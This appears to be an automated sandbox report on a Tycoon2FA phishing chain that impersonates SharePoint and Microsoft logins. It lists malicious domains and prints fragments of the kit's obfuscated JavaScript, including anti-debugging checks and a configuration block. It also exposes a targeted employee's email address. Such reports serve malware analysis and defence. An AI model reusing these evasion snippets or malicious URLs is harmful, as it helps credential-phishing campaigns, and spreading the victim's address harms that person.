Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=

Overview

General Information

Sample URL:https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=
Analysis ID:1648331
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 2016 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 3812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2008,i,10574818698735193686,9901850112885567068,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6660 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_115JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    0.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.17.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
        1.17.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
          1.20.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            1.16.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
              Click to see the 21 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-25T18:38:48.339232+010020592601A Network Trojan was detected192.185.195.216443192.168.2.1649706TCP

              Joe Sandbox Signatures

              • AV Detection
              • Phishing
              • Compliance
              • Software Vulnerabilities
              • Networking
              • System Summary
              • Malware Analysis System Evasion

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.comAvira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/favicon.icoAvira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/ijQDIZUpIw7NnlvkASolZQ1B813ohEwMWz7wxvtWcYNm6mkgDmm78170Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/GDSherpa-bold.woff2Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/mn4fJ2HLn9Uw3VPFMSNDf0KbvFvrkDMNBQbij1JmwKhaOhuNTlOHiBbeg8Y78147Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/zuOxM8qSmFU00sOufqLd4sakvsYGyoAvira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/12z3Q4M8PabCFb8920Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/wxALWfU5ETUyvmQJOvfdzop4iZ3aSLxoCsT4Kvw12129Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/klNmSZj35YUESegMa2KJQwG9kOMxhlMosJqr6yggUDmkVVSKSRLtLLeAOFHaxiYTV1ab225Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/yzgiJjBin2JwCe25de92rsEYISnLKKsSibuk7vo90174Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/zc5KphanyLHbWPTNYHyljbFGkin5Zqr8FTLfwAvira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/qrfHxgKeu2tKuiSgwCl7JHA1idmBstY7isSXi9ATYZG8x5nbjgUKksWMa1h72yDxQLaef240Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/klwMHwMulA2IdrzZU0QtBhWShAoI2kvmGDklGbE89EI3rMX7NvvZVCwuBCMZP9iuv220Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/xy0OjismZXisvhpqH54cd30Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/qrd3XcgHAY2iNoCw03ad8wRPB3hghHyTZBXwAL2gJj5wQCEWF45131Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/34jOiDrdG3K2xY9IFtzP1ghJM97cr2wJnwLVj89110Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/GDSherpa-regular.woff2Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/GDSherpa-bold.woffAvira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/GDSherpa-vf2.woff2Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/GDSherpa-regular.woffAvira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/ijgQ0CVymhNkpYAfOoHIbpxyN6zyB2A8J0jKAEoibCiGg12203Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/optp7gQK5lVR4zdBP02eR21a0IaWJZ3htroKGmT7ughSgaEmy3tAcDRKML6Qep8rCef200Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/GDSherpa-vf.woff2Avira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/lbbzFU9cG7n956YbztDc1aduPhkbdvMLKCBqlIVYQkaAGLd0tAvira URL Cloud: Label: phishing
              Source: https://ldaqmiesa.fictiougbo.ru/uvVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZApMRdu3RNd67MlVtw7oEWHHR2t8JGp85UDgXLK6y78v3sztJef260Avira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=Joe Sandbox AI: Score: 9 Reasons: The brand 'SharePoint' is a well-known Microsoft product, typically associated with the domain 'sharepoint.com'., The URL 'docusecureonlineauthenticate.skapparelbd.com' does not match the legitimate domain for SharePoint., The domain 'skapparelbd.com' does not have any known association with SharePoint or Microsoft., The presence of words like 'docusecureonlineauthenticate' in the subdomain is suspicious and indicative of phishing., The URL structure suggests an attempt to mimic a secure document access service, which is a common phishing tactic. DOM: 0.0.pages.csv
              Source: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.comJoe Sandbox AI: Score: 7 Reasons: The URL 'ldaqmiesa.fictiougbo.ru' does not clearly associate with any known or well-known brand., The domain 'fictiougbo.ru' appears unusual and does not match any legitimate domain associated with a known brand., The use of a '.ru' domain extension may indicate a foreign domain, which can be suspicious if the brand is not Russian., The presence of random characters in the subdomain 'ldaqmiesa' is a common tactic used in phishing to create confusion., The brand 'U' is not identifiable, making it difficult to associate with a legitimate domain., The input field 'Enter CAPTCHA' is often used in phishing sites to create a false sense of security. DOM: 1.5.pages.csv
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'ldaqmiesa.fictiougbo.ru' does not match the legitimate domain 'microsoft.com'., The domain 'fictiougbo.ru' is unrelated to Microsoft and uses a Russian domain extension, which is unusual for Microsoft., The URL contains random characters and does not resemble any known Microsoft subdomains or services., The email domain 'xcelenergy.com' in the input fields is unrelated to Microsoft, which raises suspicion. DOM: 2.7.pages.csv
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.4.pages.csv, type: HTML
              Source: Yara matchFile source: 2.7.pages.csv, type: HTML
              Source: Yara matchFile source: 2.8.pages.csv, type: HTML
              Source: Yara matchFile source: 2.9.pages.csv, type: HTML
              Source: Yara matchFile source: 1.17.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.5.pages.csv, type: HTML
              Source: Yara matchFile source: 1.17.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.21..script.csv, type: HTML
              Source: Yara matchFile source: 1.5.pages.csv, type: HTML
              Source: Yara matchFile source: 2.35..script.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_115, type: DROPPED
              Source: Yara matchFile source: 2.32.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.20.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.16.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.25.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.27..script.csv, type: HTML
              Source: Yara matchFile source: 2.28..script.csv, type: HTML
              Source: Yara matchFile source: 2.7.pages.csv, type: HTML
              Source: Yara matchFile source: 2.8.pages.csv, type: HTML
              Source: Yara matchFile source: 2.9.pages.csv, type: HTML
              Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://docusecureonlineauthenticate.skapparelbd.c... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of the `Function` constructor to execute remote code, along with the heavily encoded strings and URLs, suggests this script is highly suspicious and likely malicious in nature. Additionally, the script appears to be attempting to collect sensitive user data and send it to external domains, which is a clear indicator of malicious intent. Overall, this script demonstrates a significant risk and should be treated with caution.
              Source: 1.18..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode URLs and the subsequent `eval()` call to execute the decoded content pose a significant security risk. Additionally, the script appears to be attempting to bypass security measures by using techniques like `decodeURIComponent()` and `escape()`. Overall, this script exhibits a high level of malicious intent and should be considered a serious security threat.
              Source: 1.21..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
              Source: 2.27..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlr... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, redirects to a blank page, and intercepts various keyboard and mouse events to prevent common debugging and security actions. Additionally, it includes a setInterval loop that triggers a redirect to a suspicious external domain after a short delay. Overall, this script demonstrates highly suspicious and potentially malicious behavior, warranting a high-risk score.
              Source: 1.24..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of the `Function` constructor to execute obfuscated code, along with the attempt to redirect the user to an unknown domain, indicates a high likelihood of malicious intent. Additionally, the script sets up an interval that triggers a debugger, which could be used to bypass security measures. Overall, this script poses a significant risk and should be treated with caution.
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: Number of links: 0
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: Number of links: 0
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.comHTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function zaHthkXydF(event) { co...
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: Title: Secured Document - SharePoint does not match URL
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: Title: Login With Safe Access does not match URL
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: Invalid link: Terms of Use
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: Invalid link: Terms of Use
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: Invalid link: Terms of use
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: Invalid link: Privacy & cookies
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: Invalid link: Terms of use
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: Invalid link: Privacy & cookies
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: Invalid link: Terms of use
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: Invalid link: Privacy & cookies
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "onkbs2";var emailcheck = "angela.m.roell@xcelenergy.com";var webname = "rtrim(/web8/, '/')";var urlo = "/lbbzfu9cg7n956ybztdc1aduphkbdvmlkcbqlivyqkaagld0t";var gdf = "/gh8ekwbumjxm0skvborlzb32ke0pibyzzqgc45picnigcd117";var odf = "/ijdqtvs4gz6e51fee1wiwxco2t94cok4b5m5vjmfab650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(...
              Source: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.comHTTP Parser: function kfmprkcqwi(){wjflngczvm = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+ug9ydgzvbglvicygqwdlbmn5ic0gtw9kzxjuierlc2lnbjwvdgl0bgu+ciagpgxpbmsgahjlzj0iahr0chm6ly9mb250cy5nb29nbgvhcglzlmnvbs9jc3myp2zhbwlset1nb250c2vycmf0ondnahrandawozcwmczmyw1pbhk9um9ib3rvondnahramzawozqwmds1mdamzglzcgxhet1zd2fwiibyzww9inn0ewxlc2hlzxqipgogidxzdhlszt4kicagic8qiedlbmvyywwgu3r5bgvzicovciagicbib2r5ihskicagicagzm9udc1myw1pbhk6icdsb2jvdg8nlcbzyw5zlxnlcmlmowogicagicbtyxjnaw46ida7ciagicagihbhzgrpbmc6ida7ciagicagignvbg9yoiajmzmzowogicagicbsaw5llwhlawdoddogms42owogicagicbiywnrz3jvdw5klwnvbg9yoiajzjrmngy5owogicagfqokicagiggxlcbomiwgadmgewogicagicbmb250lwzhbwlsetogj01vbnrzzxjyyxqnlcbzyw5zlxnlcmlmowogicagicbjb2xvcjogizjjm2u1mdskicagih0kciagicbhihskicagicagy29sb3i6icmzndk4zgi7ciagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagih0kciagicbhomhvdmvyihskicagicagdgv4dc1kzwnvcmf0aw9uoib1bmrlc...
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: <input type="password" .../> found
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: No favicon
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: No favicon
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: No favicon
              Source: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.comHTTP Parser: No favicon
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: No favicon
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: No favicon
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: No favicon
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: No <meta name="author".. found
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: No <meta name="author".. found
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: No <meta name="author".. found
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: No <meta name="author".. found
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: No <meta name="author".. found
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: No <meta name="copyright".. found
              Source: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=HTTP Parser: No <meta name="copyright".. found
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: No <meta name="copyright".. found
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: No <meta name="copyright".. found
              Source: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQHTTP Parser: No <meta name="copyright".. found
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownHTTPS traffic detected: 108.167.188.184:443 -> 192.168.2.16:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.167.188.184:443 -> 192.168.2.16:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 192.185.195.216:443 -> 192.168.2.16:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.16:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 208.80.154.240:443 -> 192.168.2.16:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.16:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.16:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 208.80.154.240:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.16:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.89.181:443 -> 192.168.2.16:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.89.181:443 -> 192.168.2.16:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.178:443 -> 192.168.2.16:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.16:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.190.141:443 -> 192.168.2.16:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.112.3:443 -> 192.168.2.16:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.16:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49800 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.84.132:443 -> 192.168.2.16:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.193.83:443 -> 192.168.2.16:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.89.181:443 -> 192.168.2.16:49810 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49822 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49823 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 11MB later: 41MB

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2059260 - Severity 1 - ET MALWARE Obfuscated Clickfix Javascript Payload Inbound : 192.185.195.216:443 -> 192.168.2.16:49706
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.35.163
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.35.163
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
